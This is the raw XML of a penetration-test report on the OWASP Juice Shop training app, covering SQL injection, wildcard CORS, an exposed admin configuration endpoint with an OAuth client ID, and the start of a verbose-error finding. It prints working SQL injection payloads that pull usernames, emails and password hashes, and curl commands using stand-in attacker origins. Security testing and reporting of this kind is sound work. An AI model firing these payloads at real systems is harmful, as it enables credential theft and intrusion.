        <w:t xml:space="preserve">- Administrative access to sensitive user data including passwords (hashed)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Ability to manipulate product data and pricing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction Steps:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Navigate to http://juiceshop:3000/rest/products/search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Append SQL injection payload to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parameter:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Basic test: q=’ OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Union test: q=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">UNION SELECT username,email,password,4,5,6,7,8,9 FROM Users–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Schema extraction: q=’ UNION SELECT sql,2,3,4,5,6,7,8,9 FROM sqlite_master–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Observe that injected SQL executes and returns unauthorized data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Request Example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /rest/products/search?q='+UNION+SELECT+username,email,password,4,5,6,7,8,9+FROM+Users-- HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: juiceshop:3000</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Use parameterized queries (prepared statements) for all database interactions. Implement input validation and sanitization. Apply the principle of least privilege to database accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Baseline search response showing normal API behavior for apple query:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-1-sqli-baseline-apple.json</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Baseline search response showing normal API behavior for apple query:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-2-sqli-baseline-apple.json</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL injection tautology attack showing successful exploitation returning all products</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3371361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="SQL injection tautology attack showing successful exploitation returning all products" title="" id="43" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-12-sqli-tautology-screenshot.png" id="44" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>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SQL injection tautology attack showing successful exploitation returning all products</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL injection UNION-based attack proof showing successful column mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3371361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="SQL injection UNION-based attack proof showing successful column mapping" title="" id="46" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-13-sqli-union-proof.png" id="47" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>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SQL injection UNION-based attack proof showing successful column mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL injection extracting complete database schema from sqlite_master table showing all table structures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3371361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="SQL injection extracting complete database schema from sqlite_master table showing all table structures" title="" id="49" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-14-sqli-schema-extraction.png" id="50" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>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SQL injection extracting complete database schema from sqlite_master table showing all table structures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extracted user credentials including admin account with password hashes via SQL injection:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId51">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-15-sqli-extracted-credentials.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Comprehensive SQL injection test summary with all confirmed vulnerabilities and extraction results:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId52">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-17-sqli-test-summary.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkStart w:id="57" w:name="finding-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="56" w:name="Xc5268d1d8069b84e4161d851894314c94c3bb4e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CORS Misconfiguration - Wildcard Allow-Origin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8.2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:hyperlink r:id="rId55">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">http://juiceshop:3000, http://juiceshop:3000/rest/user/whoami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has a dangerous CORS misconfiguration that allows cross-origin requests from any domain. The server returns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Origin: *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for all responses, enabling malicious websites to make authenticated requests on behalf of users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The application accepts requests from any origin and responds with wildcard CORS headers. Combined with the fact that cookies are likely not properly protected, an attacker can host a malicious page that makes cross-origin requests to the Juice Shop API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Exploitation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Origin header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://evil.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">receives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Origin: *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Preflight OPTIONS request shows allowed methods: GET, HEAD, PUT, PATCH, POST, DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Any domain can read API responses including user data and perform actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Cross-origin data theft from authenticated sessions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- CSRF-style attacks bypassing traditional protections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Ability to read sensitive API responses from malicious domains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Potential for session hijacking if credentials are exposed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction Steps:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Send request with arbitrary Origin header:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -H "Origin: https://attacker.com" http://juiceshop:3000/rest/user/whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Observe response includes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Origin: *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Test preflight request:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X OPTIONS -H "Origin: https://attacker.com" -H "Access-Control-Request-Method: POST" http://juiceshop:3000/rest/user/whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Response confirms all HTTP methods are allowed from any origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Root Cause:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The CORS configuration uses a wildcard (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) instead of validating and echoing specific allowed origins. This is a dangerous default that exposes the application to cross-origin attacks.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56"/>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="64" w:name="finding-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="63" w:name="X64b048ad405a87af3c90672f80091847f646cac"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sensitive Configuration Exposure - Admin Configuration Endpoint</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58">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http://juiceshop:3000/rest/admin/application-configuration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admin configuration endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/rest/admin/application-configuration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is accessible without authentication and exposes sensitive application secrets including OAuth credentials, authorized redirect URIs, and internal system configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The endpoint is publicly accessible and returns the complete application configuration including authentication secrets. This information can be used to craft OAuth attacks, understand system internals, and plan further attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Exposure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Google OAuth Client ID exposed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1005568560502-6hm16lef8oh46hr2d98vf2ohlnj4nfhq.apps.googleusercontent.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Complete list of authorized OAuth redirect URIs including localhost and internal proxies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Application secrets and security question answers embedded in configuration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Internal file paths and system structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OAuth credential theft enabling authentication bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Information disclosure for targeted attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Exposure of security question answers (e.g.,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Daniel Boone National Forest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ITsec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Reconnaissance data for crafting sophisticated attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction Steps:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Navigate to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://juiceshop:3000/rest/admin/application-configuration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Observe full JSON configuration returned without authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Search for sensitive fields:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">googleOauth.clientId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">securityTxt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">contact information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Geo-stalking answers in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">memories</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">authorizedRedirects</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">array</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sensitive Data Extracted:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OAuth Client ID for Google authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 12 authorized redirect URIs including development endpoints</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Proxy configurations for local development</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Security question answers for password reset functionality</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Root Cause:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The configuration endpoint lacks authentication and authorization checks. Sensitive secrets should never be exposed through client-accessible endpoints.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8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exposed admin configuration endpoint showing OAuth client ID and sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3371361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Exposed admin configuration endpoint showing OAuth client ID and sensitive data" title="" id="60" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/finding-339a38ee-5c38-40f3-8acf-32b01f2e5a5e-3-misconfig-exposed-admin-config.png" id="61" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>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Exposed admin configuration endpoint showing OAuth client ID and sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full exposed configuration JSON containing OAuth secrets and system details:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId62">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">images/finding-339a38ee-5c38-40f3-8acf-32b01f2e5a5e-4-misconfig-exposed-config.json</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkStart w:id="71" w:name="finding-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="70" w:name="X3d06799147c7d5ef511ce785a2dfb9ed473349a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Information Disclosure via Verbose Error Messages and Stack Traces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6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http://juiceshop:3000/api/nonexistent, http://juiceshop:3000/ftp/package.json.bak</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reveals internal server paths, framework versions, and detailed stack traces in error responses. This information aids attackers in reconnaissance and targeted exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
